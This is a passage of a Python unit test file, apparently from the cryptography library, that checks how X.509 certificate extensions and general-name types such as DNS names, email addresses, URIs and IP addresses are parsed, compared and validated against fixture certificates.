with pytest.raises(x509.ExtensionNotFound):
cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
def test_basic_constraint_not_critical(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "basic_constraints_not_critical.pem"
),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert ext is not None
assert ext.critical is False
assert ext.value.ca is False
class TestSubjectKeyIdentifierExtension(object):
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_subject_key_identifier(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = ext.value
assert ext is not None
assert ext.critical is False
assert ski.digest == binascii.unhexlify(
b"580184241bbc2b52944a3da510721451f5af3ac9"
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_subject_key_identifier(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "bc_path_length_zero.pem"),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(x509.ExtensionNotFound):
cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_from_rsa_public_key(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
assert ext.value == ski
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_from_dsa_public_key(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "dsa_selfsigned_ca.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
assert ext.value == ski
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_invalid_bit_string_padding_from_public_key(self, backend):
data = load_vectors_from_file(
filename=os.path.join(
"asymmetric",
"DER_Serialization",
"dsa_public_key_invalid_bit_string.der",
),
loader=lambda data: data.read(),
mode="rb",
)
pretend_key = pretend.stub(public_bytes=lambda x, y: data)
with pytest.raises(ValueError):
_key_identifier_from_public_key(pretend_key)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_optional_params_allowed_from_public_key(self, backend):
data = load_vectors_from_file(
filename=os.path.join(
"asymmetric",
"DER_Serialization",
"dsa_public_key_no_params.der",
),
loader=lambda data: data.read(),
mode="rb",
)
pretend_key = pretend.stub(public_bytes=lambda x, y: data)
key_identifier = _key_identifier_from_public_key(pretend_key)
assert key_identifier == binascii.unhexlify(
b"24c0133a6a492f2c48a18c7648e515db5ac76749"
)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_from_ec_public_key(self, backend):
_skip_curve_unsupported(backend, ec.SECP384R1())
cert = _load_cert(
os.path.join("x509", "ecdsa_root.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
assert ext.value == ski
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support",
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_from_ed25519_public_key(self, backend):
cert = _load_cert(
os.path.join("x509", "ed25519", "root-ed25519.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
assert ext.value == ski
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support",
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_from_ed448_public_key(self, backend):
cert = _load_cert(
os.path.join("x509", "ed448", "root-ed448.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_KEY_IDENTIFIER
)
ski = x509.SubjectKeyIdentifier.from_public_key(cert.public_key())
assert ext.value == ski
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestKeyUsageExtension(object):
def test_no_key_usage(self, backend):
cert = _load_cert(
os.path.join("x509", "verisign_md2_root.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions
with pytest.raises(x509.ExtensionNotFound) as exc:
ext.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert exc.value.oid == ExtensionOID.KEY_USAGE
def test_all_purposes(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "all_key_usages.pem"),
x509.load_pem_x509_certificate,
backend,
)
extensions = cert.extensions
ext = extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext is not None
ku = ext.value
assert ku.digital_signature is True
assert ku.content_commitment is True
assert ku.key_encipherment is True
assert ku.data_encipherment is True
assert ku.key_agreement is True
assert ku.key_cert_sign is True
assert ku.crl_sign is True
assert ku.encipher_only is True
assert ku.decipher_only is True
def test_key_cert_sign_crl_sign(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs", "pathLenConstraint6CACert.crt"
),
x509.load_der_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext is not None
assert ext.critical is True
ku = ext.value
assert ku.digital_signature is False
assert ku.content_commitment is False
assert ku.key_encipherment is False
assert ku.data_encipherment is False
assert ku.key_agreement is False
assert ku.key_cert_sign is True
assert ku.crl_sign is True
class TestDNSName(object):
def test_non_a_label(self):
with pytest.raises(ValueError):
x509.DNSName(".\xf5\xe4\xf6\xfc.example.com")
def test_init(self):
name = x509.DNSName("*.xn--4ca7aey.example.com")
assert name.value == "*.xn--4ca7aey.example.com"
with pytest.raises(TypeError):
x509.DNSName(1.3) # type:ignore[arg-type]
with pytest.raises(TypeError):
x509.DNSName(b"bytes not allowed") # type:ignore[arg-type]
def test_ne(self):
n1 = x509.DNSName("test1")
n2 = x509.DNSName("test2")
n3 = x509.DNSName("test2")
assert n1 != n2
assert not (n2 != n3)
def test_hash(self):
n1 = x509.DNSName("test1")
n2 = x509.DNSName("test2")
n3 = x509.DNSName("test2")
assert hash(n1) != hash(n2)
assert hash(n2) == hash(n3)
class TestDirectoryName(object):
def test_not_name(self):
with pytest.raises(TypeError):
x509.DirectoryName(b"notaname") # type:ignore[arg-type]
with pytest.raises(TypeError):
x509.DirectoryName(1.3) # type:ignore[arg-type]
def test_repr(self):
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "value1")])
gn = x509.DirectoryName(name)
assert repr(gn) == "<DirectoryName(value=<Name(CN=value1)>)>"
def test_eq(self):
name = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
)
name2 = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
)
gn = x509.DirectoryName(name)
gn2 = x509.DirectoryName(name2)
assert gn == gn2
def test_ne(self):
name = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
)
name2 = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.2"), "value2")]
)
gn = x509.DirectoryName(name)
gn2 = x509.DirectoryName(name2)
assert gn != gn2
assert gn != object()
def test_hash(self):
name = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
)
name2 = x509.Name(
[x509.NameAttribute(x509.ObjectIdentifier("2.999.2"), "value2")]
)
gn = x509.DirectoryName(name)
gn2 = x509.DirectoryName(name)
gn3 = x509.DirectoryName(name2)
assert hash(gn) == hash(gn2)
assert hash(gn) != hash(gn3)
class TestRFC822Name(object):
def test_repr(self):
gn = x509.RFC822Name("string")
assert repr(gn) == "<RFC822Name(value='string')>"
def test_equality(self):
gn = x509.RFC822Name("string")
gn2 = x509.RFC822Name("string2")
gn3 = x509.RFC822Name("string")
assert gn != gn2
assert gn != object()
assert gn == gn3
def test_not_text(self):
with pytest.raises(TypeError):
x509.RFC822Name(1.3) # type:ignore[arg-type]
with pytest.raises(TypeError):
x509.RFC822Name(b"bytes") # type:ignore[arg-type]
def test_invalid_email(self):
with pytest.raises(ValueError):
x509.RFC822Name("Name <email>")
with pytest.raises(ValueError):
x509.RFC822Name("")
def test_single_label(self):
gn = x509.RFC822Name("administrator")
assert gn.value == "administrator"
def test_non_a_label(self):
with pytest.raises(ValueError):
x509.RFC822Name("email@em\xe5\xefl.com")
def test_hash(self):
g1 = x509.RFC822Name("[email protected]")
g2 = x509.RFC822Name("[email protected]")
g3 = x509.RFC822Name("[email protected]")
assert hash(g1) == hash(g2)
assert hash(g1) != hash(g3)
class TestUniformResourceIdentifier(object):
def test_equality(self):
gn = x509.UniformResourceIdentifier("string")
gn2 = x509.UniformResourceIdentifier("string2")
gn3 = x509.UniformResourceIdentifier("string")
assert gn != gn2
assert gn != object()
assert gn == gn3
def test_not_text(self):
with pytest.raises(TypeError):
x509.UniformResourceIdentifier(1.3) # type:ignore[arg-type]
def test_no_parsed_hostname(self):
gn = x509.UniformResourceIdentifier("singlelabel")
assert gn.value == "singlelabel"
def test_with_port(self):
gn = x509.UniformResourceIdentifier("singlelabel:443/test")
assert gn.value == "singlelabel:443/test"
def test_non_a_label(self):
with pytest.raises(ValueError):
x509.UniformResourceIdentifier(
"http://\u043f\u044b\u043a\u0430.cryptography"
)
def test_empty_hostname(self):
gn = x509.UniformResourceIdentifier("ldap:///some-nonsense")
assert gn.value == "ldap:///some-nonsense"
def test_hash(self):
g1 = x509.UniformResourceIdentifier("http://host.com")
g2 = x509.UniformResourceIdentifier("http://host.com")
g3 = x509.UniformResourceIdentifier("http://other.com")
assert hash(g1) == hash(g2)
assert hash(g1) != hash(g3)
def test_repr(self):
gn = x509.UniformResourceIdentifier("string")
assert repr(gn) == ("<UniformResourceIdentifier(value='string')>")
class TestRegisteredID(object):
def test_not_oid(self):
with pytest.raises(TypeError):
x509.RegisteredID(b"notanoid") # type:ignore[arg-type]
with pytest.raises(TypeError):
x509.RegisteredID(1.3) # type:ignore[arg-type]
def test_repr(self):
gn = x509.RegisteredID(NameOID.COMMON_NAME)
assert repr(gn) == (
"<RegisteredID(value=<ObjectIdentifier(oid=2.5.4.3, name=commonNam"
"e)>)>"
)
def test_eq(self):
gn = x509.RegisteredID(NameOID.COMMON_NAME)
gn2 = x509.RegisteredID(NameOID.COMMON_NAME)
assert gn == gn2
def test_ne(self):
gn = x509.RegisteredID(NameOID.COMMON_NAME)
gn2 = x509.RegisteredID(ExtensionOID.BASIC_CONSTRAINTS)
assert gn != gn2
assert gn != object()
def test_hash(self):
gn = x509.RegisteredID(NameOID.COMMON_NAME)
gn2 = x509.RegisteredID(NameOID.COMMON_NAME)
gn3 = x509.RegisteredID(ExtensionOID.BASIC_CONSTRAINTS)
assert hash(gn) == hash(gn2)
assert hash(gn) != hash(gn3)
class TestIPAddress(object):
def test_not_ipaddress(self):
with pytest.raises(TypeError):
x509.IPAddress(b"notanipaddress") # type:ignore[arg-type]
with pytest.raises(TypeError):
x509.IPAddress(1.3) # type:ignore[arg-type]
def test_repr(self):
gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
assert repr(gn) == "<IPAddress(value=127.0.0.1)>"
gn2 = x509.IPAddress(ipaddress.IPv6Address("ff::"))
assert repr(gn2) == "<IPAddress(value=ff::)>"
gn3 = x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24"))
assert repr(gn3) == "<IPAddress(value=192.168.0.0/24)>"
gn4 = x509.IPAddress(ipaddress.IPv6Network("ff::/96"))
assert repr(gn4) == "<IPAddress(value=ff::/96)>"
def test_eq(self):
gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
assert gn == gn2
def test_ne(self):
gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.2"))
assert gn != gn2
assert gn != object()
def test_hash(self):
gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
gn3 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.2"))
assert hash(gn) == hash(gn2)
assert hash(gn) != hash(gn3)
class TestOtherName(object):
def test_invalid_args(self):
with pytest.raises(TypeError):
x509.OtherName(
b"notanobjectidentifier", # type:ignore[arg-type]
b"derdata",
)
with pytest.raises(TypeError):
x509.OtherName(
x509.ObjectIdentifier("1.2.3.4"),
"notderdata", # type:ignore[arg-type]
)
def test_repr(self):
gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
assert repr(gn) == (
"<OtherName(type_id=<ObjectIdentifier(oid=1.2.3.4, "
"name=Unknown OID)>, value=b'derdata')>"
)
gn = x509.OtherName(x509.ObjectIdentifier("2.5.4.65"), b"derdata")
assert repr(gn) == (
"<OtherName(type_id=<ObjectIdentifier(oid=2.5.4.65, "
"name=pseudonym)>, value=b'derdata')>"
)
def test_eq(self):
gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
assert gn == gn2
def test_ne(self):
gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
assert gn != object()
gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata2")
assert gn != gn2
gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.5"), b"derdata")
assert gn != gn2
def test_hash(self):
gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
gn3 = x509.OtherName(x509.ObjectIdentifier("1.2.3.5"), b"derdata")
assert hash(gn) == hash(gn2)
assert hash(gn) != hash(gn3)
class TestGeneralNames(object):
def test_get_values_for_type(self):
gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
names = gns.get_values_for_type(x509.DNSName)
assert names == ["cryptography.io"]
def test_iter_names(self):
gns = x509.GeneralNames(
[x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
)
assert len(gns) == 2
assert list(gns) == [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
def test_iter_input(self):
names = [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
gns = x509.GeneralNames(iter(names))
assert list(gns) == names
def test_indexing(self):
gn = x509.GeneralNames(
[
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
x509.DNSName("another.local"),
x509.RFC822Name("[email protected]"),
x509.UniformResourceIdentifier("http://another.local"),
]
)
assert gn[-1] == gn[4]
assert gn[2:6:2] == [gn[2], gn[4]]
def test_invalid_general_names(self):
with pytest.raises(TypeError):
x509.GeneralNames(
[
x509.DNSName("cryptography.io"),
"invalid", # type:ignore[list-item]
]
)
def test_repr(self):
gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
assert repr(gns) == (
"<GeneralNames([<DNSName(value='cryptography.io')>])>"
)
def test_eq(self):
gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
gns2 = x509.GeneralNames([x509.DNSName("cryptography.io")])
assert gns == gns2
def test_ne(self):
gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
gns2 = x509.GeneralNames([x509.RFC822Name("[email protected]")])
assert gns != gns2
assert gns != object()
def test_hash(self):
gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
gns2 = x509.GeneralNames([x509.DNSName("cryptography.io")])
gns3 = x509.GeneralNames([x509.RFC822Name("[email protected]")])
assert hash(gns) == hash(gns2)
assert hash(gns) != hash(gns3)
class TestIssuerAlternativeName(object):
def test_get_values_for_type(self):
san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
names = san.get_values_for_type(x509.DNSName)
assert names == ["cryptography.io"]
def test_iter_names(self):
san = x509.IssuerAlternativeName(
[x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
)
assert len(san) == 2
assert list(san) == [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
def test_indexing(self):
ian = x509.IssuerAlternativeName(
[
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
x509.DNSName("another.local"),
x509.RFC822Name("[email protected]"),
x509.UniformResourceIdentifier("http://another.local"),
]
)
assert ian[-1] == ian[4]
assert ian[2:6:2] == [ian[2], ian[4]]
def test_invalid_general_names(self):
with pytest.raises(TypeError):
x509.IssuerAlternativeName(
[
x509.DNSName("cryptography.io"),
"invalid", # type:ignore[list-item]
]
)
def test_repr(self):
san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
assert repr(san) == (
"<IssuerAlternativeName("
"<GeneralNames([<DNSName(value='cryptography.io')>])>)>"
)
def test_eq(self):
san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
san2 = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
assert san == san2
def test_ne(self):
san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
san2 = x509.IssuerAlternativeName(
[x509.RFC822Name("[email protected]")]
)
assert san != san2
assert san != object()
def test_hash(self):
ian = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
ian2 = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
ian3 = x509.IssuerAlternativeName(
[x509.RFC822Name("[email protected]")]
)
assert hash(ian) == hash(ian2)
assert hash(ian) != hash(ian3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSAIssuerAlternativeNameExtension(object):
def test_uri(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "ian_uri.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.ISSUER_ALTERNATIVE_NAME
)
assert list(ext.value) == [
x509.UniformResourceIdentifier("http://path.to.root/root.crt"),
]
class TestCRLNumber(object):
def test_eq(self):
crl_number = x509.CRLNumber(15)
assert crl_number == x509.CRLNumber(15)
def test_ne(self):
crl_number = x509.CRLNumber(15)
assert crl_number != x509.CRLNumber(14)
assert crl_number != object()
def test_repr(self):
crl_number = x509.CRLNumber(15)
assert repr(crl_number) == "<CRLNumber(15)>"
def test_invalid_number(self):
with pytest.raises(TypeError):
x509.CRLNumber("notanumber") # type:ignore[arg-type]
def test_hash(self):
c1 = x509.CRLNumber(1)
c2 = x509.CRLNumber(1)
c3 = x509.CRLNumber(2)
assert hash(c1) == hash(c2)
assert hash(c1) != hash(c3)
class TestSubjectAlternativeName(object):
def test_get_values_for_type(self):
san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
names = san.get_values_for_type(x509.DNSName)
assert names == ["cryptography.io"]
def test_iter_names(self):
san = x509.SubjectAlternativeName(
[x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
)
assert len(san) == 2
assert list(san) == [
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
]
def test_indexing(self):
san = x509.SubjectAlternativeName(
[
x509.DNSName("cryptography.io"),
x509.DNSName("crypto.local"),
x509.DNSName("another.local"),
x509.RFC822Name("[email protected]"),
x509.UniformResourceIdentifier("http://another.local"),
]
)
assert san[-1] == san[4]
assert san[2:6:2] == [san[2], san[4]]
def test_invalid_general_names(self):
with pytest.raises(TypeError):
x509.SubjectAlternativeName(
[
x509.DNSName("cryptography.io"),
"invalid", # type:ignore[list-item]
]
)
def test_repr(self):
san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
assert repr(san) == (
"<SubjectAlternativeName("
"<GeneralNames([<DNSName(value='cryptography.io')>])>)>"
)
def test_eq(self):
san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
san2 = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
assert san == san2
def test_ne(self):
san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
san2 = x509.SubjectAlternativeName(
[x509.RFC822Name("[email protected]")]
)
assert san != san2
assert san != object()
def test_hash(self):
san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
san2 = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
san3 = x509.SubjectAlternativeName(
[x509.RFC822Name("[email protected]")]
)
assert hash(san) == hash(san2)
assert hash(san) != hash(san3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSASubjectAlternativeNameExtension(object):
def test_dns_name(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
dns = san.get_values_for_type(x509.DNSName)
assert dns == ["www.cryptography.io", "cryptography.io"]
def test_wildcard_dns_name(self, backend):
cert = _load_cert(
os.path.join("x509", "wildcard_san.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
dns = ext.value.get_values_for_type(x509.DNSName)
assert dns == [
"*.langui.sh",
"langui.sh",
"*.saseliminator.com",
"saseliminator.com",
]
def test_san_empty_hostname(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_empty_hostname.pem"),
x509.load_pem_x509_certificate,
backend,
)
san = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
dns = san.value.get_values_for_type(x509.DNSName)
assert dns == [""]
def test_san_wildcard_idna_dns_name(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_wildcard_idna.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
dns = ext.value.get_values_for_type(x509.DNSName)
assert dns == ["*.xn--80ato2c.cryptography"]
def test_unsupported_gn(self, backend):
cert = _load_cert(
os.path.join("x509", "san_x400address.der"),
x509.load_der_x509_certificate,
backend,
)
with pytest.raises(x509.UnsupportedGeneralNameType) as exc:
cert.extensions
assert exc.value.type == 3
def test_registered_id(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_registered_id.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
rid = san.get_values_for_type(x509.RegisteredID)
assert rid == [x509.ObjectIdentifier("1.2.3.4")]
def test_uri(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_uri_with_port.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
uri = ext.value.get_values_for_type(x509.UniformResourceIdentifier)
assert uri == [
"gopher://xn--80ato2c.cryptography:70/path?q=s#hel" "lo",
"http://someregulardomain.com",
]
def test_ipaddress(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_ipaddr.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
ip = san.get_values_for_type(x509.IPAddress)
assert [
ipaddress.ip_address("127.0.0.1"),
ipaddress.ip_address("ff::"),
] == ip
def test_dirname(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_dirname.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
dirname = san.get_values_for_type(x509.DirectoryName)
assert [
x509.Name(
[
x509.NameAttribute(NameOID.COMMON_NAME, "test"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Org"),
x509.NameAttribute(
NameOID.STATE_OR_PROVINCE_NAME, "Texas"
),
]
)
] == dirname
def test_rfc822name(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_rfc822_idna.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
rfc822name = san.get_values_for_type(x509.RFC822Name)
assert ["[email protected]"] == rfc822name
def test_idna2003_invalid(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_idna2003_dnsname.pem"),
x509.load_pem_x509_certificate,
backend,
)
san = cert.extensions.get_extension_for_class(
x509.SubjectAlternativeName
).value
assert len(san) == 1
[name] = san
assert name.value == "xn--k4h.ws"
def test_unicode_rfc822_name_dns_name_uri(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_idna_names.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
rfc822_name = ext.value.get_values_for_type(x509.RFC822Name)
dns_name = ext.value.get_values_for_type(x509.DNSName)
uri = ext.value.get_values_for_type(x509.UniformResourceIdentifier)
assert rfc822_name == ["[email protected]"]
assert dns_name == ["xn--80ato2c.cryptography"]
assert uri == ["https://www.xn--80ato2c.cryptography"]
def test_rfc822name_dnsname_ipaddress_directoryname_uri(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_email_dns_ip_dirname_uri.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
san = ext.value
rfc822_name = san.get_values_for_type(x509.RFC822Name)
uri = san.get_values_for_type(x509.UniformResourceIdentifier)
dns = san.get_values_for_type(x509.DNSName)
ip = san.get_values_for_type(x509.IPAddress)
dirname = san.get_values_for_type(x509.DirectoryName)
assert ["[email protected]"] == rfc822_name
assert ["https://cryptography.io"] == uri
assert ["cryptography.io"] == dns
assert [
x509.Name(
[
x509.NameAttribute(NameOID.COMMON_NAME, "dirCN"),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, "Cryptographic Authority"
),
]
)
] == dirname
assert [
ipaddress.ip_address("127.0.0.1"),
ipaddress.ip_address("ff::"),
] == ip
def test_invalid_rfc822name(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_rfc822_names.pem"),
x509.load_pem_x509_certificate,
backend,
)
san = cert.extensions.get_extension_for_class(
x509.SubjectAlternativeName
).value
values = san.get_values_for_type(x509.RFC822Name)
assert values == [
"email",
"email <email>",
"email <email@email>",
"email <[email protected]>",
"myemail:",
]
def test_other_name(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "san_other_name.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert ext is not None
assert ext.critical is False
expected = x509.OtherName(
x509.ObjectIdentifier("1.2.3.4"), b"\x16\x0bHello World"
)
assert len(ext.value) == 1
assert list(ext.value)[0] == expected
othernames = ext.value.get_values_for_type(x509.OtherName)
assert othernames == [expected]
def test_certbuilder(self, backend):
sans = [
"*.example.org",
"*.xn--4ca7aey.example.com",
"foobar.example.net",
]
private_key = RSA_KEY_2048.private_key(backend)
builder = _make_certbuilder(private_key)
builder = builder.add_extension(
SubjectAlternativeName(list(map(DNSName, sans))), True
)
cert = builder.sign(private_key, hashes.SHA1(), backend)
result = [
x.value
for x in cert.extensions.get_extension_for_class(
SubjectAlternativeName
).value
]
assert result == sans
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestExtendedKeyUsageExtension(object):
def test_eku(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "extended_key_usage.pem"),
x509.load_pem_x509_certificate,
backend,
)
ext = cert.extensions.get_extension_for_oid(
ExtensionOID.EXTENDED_KEY_USAGE
)
assert ext is not None
assert ext.critical is False
assert [
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.3"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.4"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.9"),
x509.ObjectIdentifier("1.3.6.1.5.5.7.3.8"),
x509.ObjectIdentifier("2.5.29.37.0"),
x509.ObjectIdentifier("2.16.840.1.113730.4.1"),
] == list(ext.value)
class TestAccessDescription(object):
def test_invalid_access_method(self):
with pytest.raises(TypeError):
x509.AccessDescription(
"notanoid", x509.DNSName("test") # type:ignore[arg-type]
)
def test_invalid_access_location(self):
with pytest.raises(TypeError):
x509.AccessDescription(
